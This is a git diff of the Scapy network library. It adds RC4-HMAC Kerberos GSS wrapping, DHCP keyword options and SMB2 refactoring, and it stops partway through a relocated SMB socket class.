14024f4e828..5b27a3f5ac5 100644 --- a/doc/scapy/layers/dcerpc.rst +++ b/doc/scapy/layers/dcerpc.rst @@ -428,7 +428,7 @@ If you're doing passive sniffing of a DCE/RPC session, you can instruct Scapy to pkts.show() -.. warning:: Only NTLM is currently fully supported. KerberosSSP is sadly not supported as of today, nor is NetlogonSSP. +.. warning:: NTLM, KerberosSSP and SPNEGOSSP are currently supported. NetlogonSSP is still unsupported. Define custom packets diff --git a/scapy/automaton.py b/scapy/automaton.py index 842dc3654e2..94ecdce6b6e 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -1027,11 +1027,11 @@ def master_filter(self, pkt): # type: (Packet) -> bool return True - def my_send(self, pkt): - # type: (Packet) -> None + def my_send(self, pkt, **kwargs): + # type: (Packet, **Any) -> None if not self.send_sock: raise ValueError("send_sock is None !") - self.send_sock.send(pkt) + self.send_sock.send(pkt, **kwargs) def update_sock(self, sock): # type: (SuperSocket) -> None @@ -1172,8 +1172,8 @@ def isrunning(self): # type: () -> bool return self.started.locked() - def send(self, pkt): - # type: (Packet) -> None + def send(self, pkt, **kwargs): + # type: (Packet, **Any) -> None if self.state.state in self.interception_points: self.debug(3, "INTERCEPT: packet intercepted: %s" % pkt.summary()) self.intercepted_packet = pkt @@ -1196,7 +1196,7 @@ def send(self, pkt): self.debug(3, "INTERCEPT: packet accepted") else: raise self.AutomatonError("INTERCEPT: unknown verdict: %r" % cmd.type) # noqa: E501 - self.my_send(pkt) + self.my_send(pkt, **kwargs) self.debug(3, "SENT : %s" % pkt.summary()) if self.store_packets: diff --git a/scapy/config.py b/scapy/config.py index bc8c8a1c6d8..c55eb096fbd 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -1106,8 +1106,8 @@ class Conf(ConfClass): #: When TCPSession is used, parse DCE/RPC sessions automatically. #: This should be used for passive sniffing. dcerpc_session_enable = False - #: Some implementations of DCE/RPC incorrectly use header signing - #: without properly negotiating it. This forces it on. + #: If a capture is missing the first DCE/RPC bindin message, we might incorrectly + #: assume that header signing isn't used. This forces it on. dcerpc_force_header_signing = False #: Windows SSPs for sniffing. This is used with #: dcerpc_session_enable diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index dbab259e97e..a70659e87c2 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -2563,7 +2563,7 @@ def __init__(self, *args, **kwargs): self.map_callid_opnum = {} self.frags = collections.defaultdict(lambda: b"") self.sniffsspcontexts = {} # Unfinished contexts for passive - if conf.winssps_passive: + if conf.dcerpc_session_enable and conf.winssps_passive: for ssp in conf.winssps_passive: self.sniffsspcontexts[ssp] = None super(DceRpcSession, self).__init__(*args, **kwargs) @@ -2674,7 +2674,7 @@ def in_pkt(self, pkt): if conf.raw_layer in pkt: body = bytes(pkt[conf.raw_layer]) # If we are doing passive sniffing - if conf.winssps_passive: + if conf.dcerpc_session_enable and conf.winssps_passive: # We have Windows SSPs, and no current context if pkt.auth_verifier and pkt.auth_verifier.is_ssp(): # This is a bind/alter/auth3 req/resp diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 4875dbf1e4a..3b316da0f48 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -596,7 +596,8 @@ def parse_options(self, nameserver=None, domain=None, renewal_time=60, - lease_time=1800): + lease_time=1800, + **kwargs): """ :param pool: the range of addresses to distribute. Can be a Net, a list of IPs or a string (always gives the same IP). @@ -604,6 +605,12 @@ def parse_options(self, :param gw: the gateway IP (can be None) :param nameserver: the DNS server IP (by default, same than gw) :param domain: the domain to advertise (can be None) + + Other DHCP parameters can be passed as kwargs. See DHCPOptions in dhcp.py. + For instance:: + + dhcpd(pool=Net("10.0.10.0/24"), network="10.0.0.0/8", gw="10.0.10.1", + classless_static_routes=["1.2.3.4/32:9.8.7.6"]) """ self.domain = domain netw, msk = (network.split("/") + ["32"])[:2] @@ -624,6 +631,7 @@ def parse_options(self, self.lease_time = lease_time self.renewal_time = renewal_time self.leases = {} + self.kwargs = kwargs def is_request(self, req): if not req.haslayer(BOOTP): @@ -680,6 +688,8 @@ def make_reply(self, req): ] if x[1] is not None ] + if self.kwargs: + dhcp_options += self.kwargs.items() dhcp_options.append("end") resp /= DHCP(options=dhcp_options) return resp diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 8306ced16a6..a98ba1544fc 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -115,7 +115,7 @@ ) from scapy.packet import Packet, bind_bottom_up, bind_top_down, bind_layers from scapy.supersocket import StreamSocket -from scapy.utils import strrot +from scapy.utils import strrot, strxor from scapy.volatile import GeneralizedTime, RandNum, RandBin from scapy.layers.gssapi import ( @@ -2064,6 +2064,14 @@ class KRB_InnerToken(Packet): ), ] + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 13: + # Older RFC1964 variants of the token have KRB_GSSAPI_Token wrapper + if _pkt[2:13] == b"\x06\t*\x86H\x86\xf7\x12\x01\x02\x02": + return KRB_GSSAPI_Token + return cls + # RFC 4121 - sect 4.1 @@ -2091,7 +2099,7 @@ class KRB_GSS_MIC_RFC1964(Packet): fields_desc = [ LEShortEnumField("SGN_ALG", 0, _SGN_ALGS), XLEIntField("Filler", 0xFFFFFFFF), - LongField("SND_SEQ", 0), + XStrFixedLenField("SND_SEQ", b"", length=8), PadField( # sect 1.2.2.3 XStrFixedLenField("SGN_CKSUM", b"", length=8), align=8, @@ -2111,7 +2119,7 @@ class KRB_GSS_Wrap_RFC1964(Packet): LEShortEnumField("SGN_ALG", 0, _SGN_ALGS), LEShortEnumField("SEAL_ALG", 0, _SEAL_ALGS), XLEShortField("Filler", 0xFFFF), - LongField("SND_SEQ", 0), + XStrFixedLenField("SND_SEQ", b"", length=8), PadField( # sect 1.2.2.3 XStrFixedLenField("SGN_CKSUM", b"", length=8), align=8, @@ -3124,7 +3132,8 @@ def kpasswd( if not resp: raise TimeoutError("KPASSWD_REQ timed out !") if KPASSWD_REP not in resp: - raise ValueError("Invalid response to KPASSWD_RED !") + resp.show() + raise ValueError("Invalid response to KPASSWD_REQ !") Context, tok, negResult = ssp.GSS_Init_sec_context(Context, resp.aprep) if negResult != GSS_S_COMPLETE: warning("SSP failed on subsequent GSS_Init_sec_context !") @@ -3240,6 +3249,7 @@ def __init__( TGT=None, DC_IP=None, REQUIRE_U2U=False, + SKEY_TYPE=None, debug=0, **kwargs, ): @@ -3253,6 +3263,11 @@ def __init__( self.DC_IP = DC_IP self.REQUIRE_U2U = REQUIRE_U2U self.debug = debug + if SKEY_TYPE is None: + from scapy.libs.rfc3961 import EncryptionType + + SKEY_TYPE = EncryptionType.AES128_CTS_HMAC_SHA1_96 + self.SKEY_TYPE = SKEY_TYPE super(KerberosSSP, self).__init__(**kwargs) def GSS_GetMICEx(self, Context, msgs, qop_req=0): @@ -3279,7 +3294,7 @@ def GSS_GetMICEx(self, Context, msgs, qop_req=0): ) else: raise NotImplementedError - Context.SendSeqNum += +1 + Context.SendSeqNum += 1 return sig def GSS_VerifyMICEx(self, Context, msgs, signature): @@ -3307,9 +3322,10 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): [MS-KILE] sect 3.4.5.4 - AES: RFC4121 sect 4.2.6.2 and [MS-KILE] sect 3.4.5.4.1 + - HMAC-RC4: RFC4757 sect 7.3 and [MS-KILE] sect 3.4.5.4.1 """ + confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG if Context.KrbSessionKey.etype in [17, 18]: # AES - confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG # Build token tok = KRB_InnerToken( TOK_ID=b"\x05\x04", @@ -3321,29 +3337,42 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): RRC=0, ), ) + Context.SendSeqNum += 1 # Real separation starts now: RFC4121 sect 4.2.4 if confidentiality: # Confidentiality is requested (see RFC4121 sect 4.3) # {"header" | encrypt(plaintext-data | filler | "header")} - # 0. Concatenate the data + # 0. Roll confounder + Confounder = os.urandom(Context.KrbSessionKey.ep.blocksize) + # 1. Concatenate the data to be encrypted Data = b"".join(x.data for x in msgs if x.conf_req_flag) DataLen = len(Data) - # 1. Add filler - tok.root.EC = (-DataLen) % Context.KrbSessionKey.ep.blocksize - Data += b"\x00" * tok.root.EC - # 2. Add first 16 octets of the Wrap token "header" - Data += bytes(tok)[:16] - # 3. encrypt() is the encryption operation (which provides for + # 2. Add filler + tok.root.EC = ((-DataLen) % Context.KrbSessionKey.ep.blocksize) or 16 + Filler = b"\x00" * tok.root.EC + Data += Filler + # 3. Add first 16 octets of the Wrap token "header" + PlainHeader = bytes(tok)[:16] + Data += PlainHeader + # 4. Build 'ToSign', exclusively used for checksum + ToSign = Confounder + ToSign += b"".join(x.data for x in msgs if x.sign) + ToSign += Filler + ToSign += PlainHeader + # 5. Finalize token for signing + # "The RRC field is [...] 28 if encryption is requested." + tok.root.RRC = 28 + # 6. encrypt() is the encryption operation (which provides for # integrity protection) Data = Context.KrbSessionKey.encrypt( keyusage=Context.SendSealKeyUsage, plaintext=Data, + confounder=Confounder, + signtext=ToSign, ) - # "The RRC field is [...] 28 if encryption is requested." - tok.root.RRC = 28 - # 4. Rotate + # 7. Rotate Data = strrot(Data, tok.root.RRC + tok.root.EC) - # 5. Split (token and encrypted messages) + # 8. Split (token and encrypted messages) toklen = len(Data) - DataLen tok.root.Data = Data[:toklen] offset = toklen @@ -3382,6 +3411,77 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): # 4. Rotate tok.root.Data = strrot(Data, tok.root.RRC) return msgs, tok + elif Context.KrbSessionKey.etype in [23, 24]: # RC4 + from scapy.libs.rfc3961 import Hmac_MD5, Cipher, algorithms, _rfc1964pad + + # Build token + seq = struct.pack(">I", Context.SendSeqNum) + tok = KRB_InnerToken( + TOK_ID=b"\x02\x01", + root=KRB_GSS_Wrap_RFC1964( + SGN_ALG="HMAC", + SEAL_ALG="RC4" if confidentiality else "none", + SND_SEQ=seq + + ( + # See errata + b"\xff\xff\xff\xff" + if Context.IsAcceptor + else b"\x00\x00\x00\x00" + ), + ), + ) + Context.SendSeqNum += 1 + # 0. Concatenate data + ToSign = _rfc1964pad(b"".join(x.data for x in msgs if x.sign)) + ToEncrypt = b"".join(x.data for x in msgs if x.conf_req_flag) + Kss = Context.KrbSessionKey.key + # 1. Roll confounder + Confounder = os.urandom(8) + # 2. Compute the 'Kseq' key + Klocal = strxor(Kss, len(Kss) * b"\xf0") + if Context.KrbSessionKey.etype == 24: # EXP + Kcrypt = Hmac_MD5(Klocal).digest(b"fortybits\x00" + b"\x00\x00\x00\x00") + Kcrypt = Kcrypt[:7] + b"\xab" * 9 + else: + Kcrypt = Hmac_MD5(Klocal).digest(b"\x00\x00\x00\x00") + Kcrypt = Hmac_MD5(Kcrypt).digest(seq) + # 3. Build SGN_CKSUM + tok.root.SGN_CKSUM = Context.KrbSessionKey.make_checksum( + keyusage=13, # See errata + text=bytes(tok)[:8] + Confounder + ToSign, + )[:8] + # 4. Populate token + encrypt + if confidentiality: + # 'encrypt' is requested + rc4 = Cipher(algorithms.ARC4(Kcrypt), mode=None).encryptor() + tok.root.CONFOUNDER = rc4.update(Confounder) + Data = rc4.update(ToEncrypt) + # Split encrypted data + offset = 0 + for msg in msgs: + msglen = len(msg.data) + if msg.conf_req_flag: + msg.data = Data[offset : offset + msglen] + offset += msglen + else: + # 'encrypt' is not requested + tok.root.CONFOUNDER = Confounder + # 5. Compute the 'Kseq' key + if Context.KrbSessionKey.etype == 24: # EXP + Kseq = Hmac_MD5(Kss).digest(b"fortybits\x00" + b"\x00\x00\x00\x00") + Kseq = Kseq[:7] + b"\xab" * 9 + else: + Kseq = Hmac_MD5(Kss).digest(b"\x00\x00\x00\x00") + Kseq = Hmac_MD5(Kseq).digest(tok.root.SGN_CKSUM) + # 6. Encrypt 'SND_SEQ' + rc4 = Cipher(algorithms.ARC4(Kseq), mode=None).encryptor() + tok.root.SND_SEQ = rc4.update(tok.root.SND_SEQ) + # 7. Include 'InitialContextToken pseudo ASN.1 header' + tok = KRB_GSSAPI_Token( + MechType="1.2.840.113554.1.2.2", # Kerberos 5 + innerToken=tok, + ) + return msgs, tok else: raise NotImplementedError @@ -3390,9 +3490,10 @@ def GSS_UnwrapEx(self, Context, msgs, signature): [MS-KILE] sect 3.4.5.5 - AES: RFC4121 sect 4.2.6.2 + - HMAC-RC4: RFC4757 sect 7.3 """ + confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG if Context.KrbSessionKey.etype in [17, 18]: # AES - confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG # Real separation starts now: RFC4121 sect 4.2.4 if confidentiality: # 0. Concatenate the data @@ -3400,22 +3501,41 @@ def GSS_UnwrapEx(self, Context, msgs, signature): Data += b"".join(x.data for x in msgs if x.conf_req_flag) # 1. Un-Rotate Data = strrot(Data, signature.root.RRC + signature.root.EC, right=False) - # 2. Decrypt + + # 2. Function to build 'ToSign', exclusively used for checksum + def MakeToSign(Confounder, DecText): + offset = 0 + # 2.a Confounder + ToSign = Confounder + # 2.b Messages + for msg in msgs: + msglen = len(msg.data) + if msg.conf_req_flag: + ToSign += DecText[offset : offset + msglen] + offset += msglen + elif msg.sign: + ToSign += msg.data + # 2.c Filler & Padding + ToSign += DecText[offset:] + return ToSign + + # 3. Decrypt Data = Context.KrbSessionKey.decrypt( keyusage=Context.RecvSealKeyUsage, ciphertext=Data, + presignfunc=MakeToSign, ) - # 3. Split + # 4. Split Data, f16header = ( Data[:-16], Data[-16:], ) - # 4. Check header + # 5. Check header hdr = signature.copy() hdr.root.RRC = 0 if f16header != bytes(hdr)[:16]: raise ValueError("ERROR: Headers don't match") - # 5. Split (and ignore filler) + # 6. Split (and ignore filler) offset = 0 for msg in msgs: msglen = len(msg.data) @@ -3431,7 +3551,7 @@ def GSS_UnwrapEx(self, Context, msgs, signature): # 1. Un-Rotate Data = strrot(Data, signature.root.RRC, right=False) # 2. Split - Data, Mic = Data[:-signature.root.EC], Data[-signature.root.EC:] + Data, Mic = Data[: -signature.root.EC], Data[-signature.root.EC :] # "Both the EC field and the RRC field in # the token header SHALL be filled with zeroes for the purpose of # calculating the checksum." @@ -3454,6 +3574,57 @@ def GSS_UnwrapEx(self, Context, msgs, signature): if msg.sign: msg.data = Data return msgs + elif Context.KrbSessionKey.etype in [23, 24]: # RC4 + from scapy.libs.rfc3961 import Hmac_MD5, Cipher, algorithms, _rfc1964pad + + # Drop wrapping + tok = signature.innerToken + + # 0. Concatenate data + ToDecrypt = b"".join(x.data for x in msgs if x.conf_req_flag) + Kss = Context.KrbSessionKey.key + # 1. Compute the 'Kseq' key + if Context.KrbSessionKey.etype == 24: # EXP + Kseq = Hmac_MD5(Kss).digest(b"fortybits\x00" + b"\x00\x00\x00\x00") + Kseq = Kseq[:7] + b"\xab" * 9 + else: + Kseq = Hmac_MD5(Kss).digest(b"\x00\x00\x00\x00") + Kseq = Hmac_MD5(Kseq).digest(tok.root.SGN_CKSUM) + # 2. Decrypt 'SND_SEQ' + rc4 = Cipher(algorithms.ARC4(Kseq), mode=None).encryptor() + seq = rc4.update(tok.root.SND_SEQ)[:4] + # 3. Compute the 'Kcrypt' key + Klocal = strxor(Kss, len(Kss) * b"\xf0") + if Context.KrbSessionKey.etype == 24: # EXP + Kcrypt = Hmac_MD5(Klocal).digest(b"fortybits\x00" + b"\x00\x00\x00\x00") + Kcrypt = Kcrypt[:7] + b"\xab" * 9 + else: + Kcrypt = Hmac_MD5(Klocal).digest(b"\x00\x00\x00\x00") + Kcrypt = Hmac_MD5(Kcrypt).digest(seq) + # 4. Decrypt + if confidentiality: + # 'encrypt' was requested + rc4 = Cipher(algorithms.ARC4(Kcrypt), mode=None).encryptor() + Confounder = rc4.update(tok.root.CONFOUNDER) + Data = rc4.update(ToDecrypt) + # Split encrypted data + offset = 0 + for msg in msgs: + msglen = len(msg.data) + if msg.conf_req_flag: + msg.data = Data[offset : offset + msglen] + offset += msglen + else: + # 'encrypt' was not requested + Confounder = tok.root.CONFOUNDER + # 5. Verify SGN_CKSUM + ToSign = _rfc1964pad(b"".join(x.data for x in msgs if x.sign)) + Context.KrbSessionKey.verify_checksum( + keyusage=13, # See errata + text=bytes(tok)[:8] + Confounder + ToSign, + cksum=tok.root.SGN_CKSUM, + ) + return msgs else: raise NotImplementedError @@ -3464,7 +3635,7 @@ def GSS_Init_sec_context( # New context Context = self.CONTEXT(IsAcceptor=False, req_flags=req_flags) - from scapy.libs.rfc3961 import Key, EncryptionType + from scapy.libs.rfc3961 import Key if Context.state == self.STATE.INIT and self.U2U: # U2U - Get TGT @@ -3555,7 +3726,7 @@ def GSS_Init_sec_context( # Build the authenticator now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) Context.KrbSessionKey = Key.random_to_key( - EncryptionType.AES128_CTS_HMAC_SHA1_96, + self.SKEY_TYPE, os.urandom(16), ) Context.SendSeqNum = RandNum(0, 0x7FFFFFFF)._fix() @@ -3682,7 +3853,7 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): # New context Context = self.CONTEXT(IsAcceptor=True, req_flags=0) - from scapy.libs.rfc3961 import Key, EncryptionType + from scapy.libs.rfc3961 import Key if Context.state == self.STATE.INIT: if not self.SPN: @@ -3756,7 +3927,20 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): tkt = ap_req.ticket.encPart.decrypt(self.KEY) except ValueError as ex: warning("KerberosSSP: %s (bad KEY?)" % ex) - return Context, None, GSS_S_DEFECTIVE_TOKEN + now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + err = KRB_GSSAPI_Token( + innerToken=KRB_InnerToken( + TOK_ID=b"\x03\x00", + root=KRB_ERROR( + errorCode="KRB_AP_ERR_MODIFIED", + stime=ASN1_GENERALIZED_TIME(now_time), + realm=ap_req.ticket.realm, + sname=ap_req.ticket.sname, + eData=None, + ), + ) + ) + return Context, err, GSS_S_DEFECTIVE_TOKEN # Get AP-REP session key Context.STSessionKey = tkt.key.toKey() authenticator = ap_req.authenticator.decrypt(Context.STSessionKey) @@ -3764,7 +3948,7 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): subkey = None if ap_req.apOptions.val[2] == "1": # mutual-required appkey = Key.random_to_key( - EncryptionType.AES128_CTS_HMAC_SHA1_96, + self.SKEY_TYPE, os.urandom(16), ) Context.KrbSessionKey = appkey @@ -3803,7 +3987,6 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): # verify that the message is constructed correctly. if not val: return Context, None, GSS_S_DEFECTIVE_TOKEN - val.show() # Server receives AP-req, sends AP-rep if isinstance(val, KRB_AP_REP): # Raw AP_REP was passed @@ -3857,9 +4040,13 @@ def GSS_Passive_set_Direction(self, Context: CONTEXT, IsAcceptor=False): def MaximumSignatureLength(self, Context: CONTEXT): if Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG: - # FIXME, this is broken + # TODO: support DES if Context.KrbSessionKey.etype in [17, 18]: # AES - return 60 + return 76 + elif Context.KrbSessionKey.etype in [23, 24]: # RC4_HMAC + return 45 + else: + raise NotImplementedError else: return 28 diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 7a9371636c9..97fc2096332 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -1044,7 +1044,7 @@ class LDAP_Client(object): Example 2 - SASL_GSSAPI - Kerberos:: - ssp = KerberosSSP(UPN="Administrator", PASSWORD="Password1!", + ssp = KerberosSSP(UPN="Administrator@domain.local", PASSWORD="Password1!", SPN="ldap/dc1.domain.local") client = LDAP_Client( LDAP_BIND_MECHS.SASL_GSSAPI, @@ -1057,7 +1057,7 @@ class LDAP_Client(object): ssp = SPNEGOSSP([ NTLMSSP(UPN="Administrator", PASSWORD="Password1!"), - KerberosSSP(UPN="Administrator", PASSWORD="Password1!", + KerberosSSP(UPN="Administrator@domain.local", PASSWORD="Password1!", SPN="ldap/dc1.domain.local"), ]) client = LDAP_Client( diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index f2c06533d22..251202e1c57 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -180,7 +180,10 @@ def sr1_req(self, pkt, **kwargs): if self.verb: print(conf.color_theme.opening(">> REQUEST: %s" % pkt.__class__.__name__)) # Send/receive - resp = self.sr1(DceRpc5Request(cont_id=self.cont_id) / pkt, **kwargs) + resp = self.sr1( + DceRpc5Request(cont_id=self.cont_id, alloc_hint=len(pkt)) / pkt, + **kwargs, + ) if DceRpc5Response in resp: if self.verb: print( @@ -271,9 +274,12 @@ def _bind(self, interface, reqcls, respcls): + (" (with %s)" % self.ssp.__class__.__name__ if self.ssp else "") ) ) - if not self.ssp or self.transport == DCERPC_Transport.NCACN_NP: - # NCACN_NP = SMB does not bind the RPC securely, as it has already - # authenticated during the SMB Session Setup + if not self.ssp or ( + self.transport == DCERPC_Transport.NCACN_NP + and self.auth_level < DCE_C_AUTHN_LEVEL.PKT_INTEGRITY + ): + # NCACN_NP = SMB without INTEGRITY/PRIVACY does not bind the RPC securely, + # again as it has already authenticated during the SMB Session Setup resp = self.sr1( reqcls(context_elem=self.get_bind_context(interface)), auth_verifier=None, @@ -281,7 +287,7 @@ def _bind(self, interface, reqcls, respcls): status = GSS_S_COMPLETE else: # Perform authentication - self.sspcontext, token, _ = self.ssp.GSS_Init_sec_context( + self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, req_flags=( # SSPs need to be instantiated with some special flags @@ -302,6 +308,9 @@ def _bind(self, interface, reqcls, respcls): ) ), ) + if status not in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: + # Authentication failed. + return False resp = self.sr1( reqcls(context_elem=self.get_bind_context(interface)), auth_verifier=( diff --git a/scapy/layers/msrpce/rpcserver.py b/scapy/layers/msrpce/rpcserver.py index 470ac914267..807f111d0c9 100644 --- a/scapy/layers/msrpce/rpcserver.py +++ b/scapy/layers/msrpce/rpcserver.py @@ -279,12 +279,13 @@ def recv(self, data): return # auth_verifier here contains the SSP nego packets # (whereas it usually contains the verifiers) - hdr.auth_verifier = CommonAuthVerifier( - auth_type=req.auth_verifier.auth_type, - auth_level=req.auth_verifier.auth_level, - auth_context_id=req.auth_verifier.auth_context_id, - auth_value=auth_value, - ) + if auth_value is not None: + hdr.auth_verifier = CommonAuthVerifier( + auth_type=req.auth_verifier.auth_type, + auth_level=req.auth_verifier.auth_level, + auth_context_id=req.auth_verifier.auth_context_id, + auth_value=auth_value, + ) def get_result(ctx): name = ctx.transfer_syntaxes[0].sprintf("%if_uuid%") diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 395383fbd45..4f2fbd3860c 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -11,11 +11,13 @@ `SMB `_ """ +import os import collections +import functools import hashlib import struct -from scapy.config import conf +from scapy.config import conf, crypto_validator from scapy.error import log_runtime from scapy.packet import Packet, bind_layers, bind_top_down from scapy.fields import ( @@ -59,8 +61,12 @@ XStrLenField, XStrFixedLenField, ) +from scapy.sessions import DefaultSession from scapy.supersocket import StreamSocket +if conf.crypto_valid: + from scapy.libs.rfc3961 import SP800108_KDFCTR + from scapy.layers.gssapi import GSSAPI_BLOB from scapy.layers.netbios import NBTSession from scapy.layers.ntlm import ( @@ -236,6 +242,21 @@ 0x0004: "Pattern_V1", } +# [MS-SMB2] sect 2.2.3.1.2 +SMB2_ENCRYPTION_CIPHERS = { + 0x0001: "AES-128-CCM", + 0x0002: "AES-128-GCM", + 0x0003: "AES-256-CCM", + 0x0004: "AES-256-GCM", +} + +# [MS-SMB2] sect 2.2.3.1.7 +SMB2_SIGNING_ALGORITHMS = { + 0x0000: "HMAC-SHA256", + 0x0001: "AES-CMAC", + 0x0002: "AES-GMAC", +} + # sect [MS-SMB2] 2.2.13.1.1 SMB2_ACCESS_FLAGS_FILE = { 0x00000001: "FILE_READ_DATA", @@ -806,6 +827,7 @@ class WINNT_ACE_HEADER(Packet): def extract_padding(self, p): return p[: self.AceSize - 4], p[self.AceSize - 4 :] + # fmt: off def toSDDL(self): """ Return SDDL @@ -905,6 +927,9 @@ def lit(ct): ) +# fmt: on + + # [MS-DTYP] sect 2.4.4.2 @@ -936,49 +961,54 @@ def default_payload_class(self, payload): return conf.padding_layer +# fmt: off WINNT_APPLICATION_DATA_LITERAL_TOKEN.fields_desc = [ - ByteEnumField("TokenType", 0, { - # [MS-DTYP] sect 2.4.4.17.5 - 0x00: "Padding token", - 0x01: "Signed int8", - 0x02: "Signed int16", - 0x03: "Signed int32", - 0x04: "Signed int64", - 0x10: "Unicode", - 0x18: "Octet String", - 0x50: "Composite", - 0x51: "SID", - # [MS-DTYP] sect 2.4.4.17.6 - 0x80: "==", - 0x81: "!=", - 0x82: "<", - 0x83: "<=", - 0x84: ">", - 0x85: ">=", - 0x86: "Contains", - 0x88: "Any_of", - 0x8e: "Not_Contains", - 0x8f: "Not_Any_of", - 0x89: "Member_of", - 0x8a: "Device_Member_of", - 0x8b: "Member_of_Any", - 0x8c: "Device_Member_of_Any", - 0x90: "Not_Member_of", - 0x91: "Not_Device_Member_of", - 0x92: "Not_Member_of_Any", - 0x93: "Not_Device_Member_of_Any", - # [MS-DTYP] sect 2.4.4.17.7 - 0x87: "Exists", - 0x8d: "Not_Exists", - 0xa0: "&&", - 0xa1: "||", - 0xa2: "!", - # [MS-DTYP] sect 2.4.4.17.8 - 0xf8: "Local attribute", - 0xf9: "User Attribute", - 0xfa: "Resource Attribute", - 0xfb: "Device Attribute", - }), + ByteEnumField( + "TokenType", + 0, + { + # [MS-DTYP] sect 2.4.4.17.5 + 0x00: "Padding token", + 0x01: "Signed int8", + 0x02: "Signed int16", + 0x03: "Signed int32", + 0x04: "Signed int64", + 0x10: "Unicode", + 0x18: "Octet String", + 0x50: "Composite", + 0x51: "SID", + # [MS-DTYP] sect 2.4.4.17.6 + 0x80: "==", + 0x81: "!=", + 0x82: "<", + 0x83: "<=", + 0x84: ">", + 0x85: ">=", + 0x86: "Contains", + 0x88: "Any_of", + 0x8e: "Not_Contains", + 0x8f: "Not_Any_of", + 0x89: "Member_of", + 0x8a: "Device_Member_of", + 0x8b: "Member_of_Any", + 0x8c: "Device_Member_of_Any", + 0x90: "Not_Member_of", + 0x91: "Not_Device_Member_of", + 0x92: "Not_Member_of_Any", + 0x93: "Not_Device_Member_of_Any", + # [MS-DTYP] sect 2.4.4.17.7 + 0x87: "Exists", + 0x8d: "Not_Exists", + 0xa0: "&&", + 0xa1: "||", + 0xa2: "!", + # [MS-DTYP] sect 2.4.4.17.8 + 0xf8: "Local attribute", + 0xf9: "User Attribute", + 0xfa: "Resource Attribute", + 0xfb: "Device Attribute", + } + ), ConditionalField( # Strings LEIntField("length", 0), @@ -1054,6 +1084,7 @@ def default_payload_class(self, payload): ] ), ] +# fmt: on class WINNT_APPLICATION_DATA(Packet): @@ -1076,9 +1107,7 @@ def default_payload_class(self, payload): class WINNT_ACCESS_ALLOWED_CALLBACK_ACE(Packet): fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + [ PacketField( - "ApplicationData", - WINNT_APPLICATION_DATA(), - WINNT_APPLICATION_DATA + "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA ), ] @@ -1553,40 +1582,6 @@ def guess_payload_class(self, s): return super(_SMB2_Payload, self).guess_payload_class(s) -class SMBStreamSocket(StreamSocket): - """ - A modified StreamSocket to dissect SMB compounded requests - [MS-SMB2] 3.3.5.2.7 - """ - - def __init__(self, *args, **kwargs): - self.queue = collections.deque() - super(SMBStreamSocket, self).__init__(*args, **kwargs) - - def recv(self, x=None): - # note: normal StreamSocket takes care of NBTSession / DirectTCP fragments. - # this takes care of compounded requests - if self.queue: - return self.queue.popleft() - pkt = super(SMBStreamSocket, self).recv(x) - if pkt is not None and SMB2_Header in pkt: - pay = pkt[SMB2_Header].payload - while SMB2_Header in pay: - pay = pay[SMB2_Header] - pay.underlayer.remove_payload() - self.queue.append(pay) - if not pay.NextCommand: - break - pay = pay.payload - return pkt - - @staticmethod - def select(sockets, remain=conf.recv_poll_rate): - if any(getattr(x, "queue", None) for x in sockets): - return [x for x in sockets if isinstance(x, SMBStreamSocket) and x.queue] - return StreamSocket.select(sockets, remain=remain) - - # sect 2.2.2 @@ -1825,12 +1820,7 @@ class SMB2_Encryption_Capabilities(Packet): LEShortEnumField( "", 0x0, - { - 0x0001: "AES-128-CCM", - 0x0002: "AES-128-GCM", - 0x0003: "AES-256-CCM", - 0x0004: "AES-256-GCM", - }, + SMB2_ENCRYPTION_CIPHERS, ), count_from=lambda pkt: pkt.CipherCount, ), @@ -1962,11 +1952,7 @@ class SMB2_Signing_Capabilities(Packet): LEShortEnumField( "", 0x0, - { - 0x0000: "HMAC-SHA256", - 0x0001: "AES-CMAC", - 0x0002: "AES-GMAC", - }, + SMB2_SIGNING_ALGORITHMS, ), count_from=lambda pkt: pkt.SigningAlgorithmCount, ), @@ -4055,3 +4041,212 @@ def SMB2computePreauthIntegrityHashValue( hasher = {"SHA-512": hashlib.sha512}[HashId] # compute the hash of concatenation of previous and bytes return hasher(PreauthIntegrityHashValue + s).digest() + + +# SMB2 socket and session + + +class SMBStreamSocket(StreamSocket): + """ + A modified StreamSocket to dissect SMB compounded requests + [MS-SMB2] 3.3.5.2.7 + """ + + def __init__(self, *args, **kwargs): + self.queue = collections.deque() + self.session = SMBSession() + 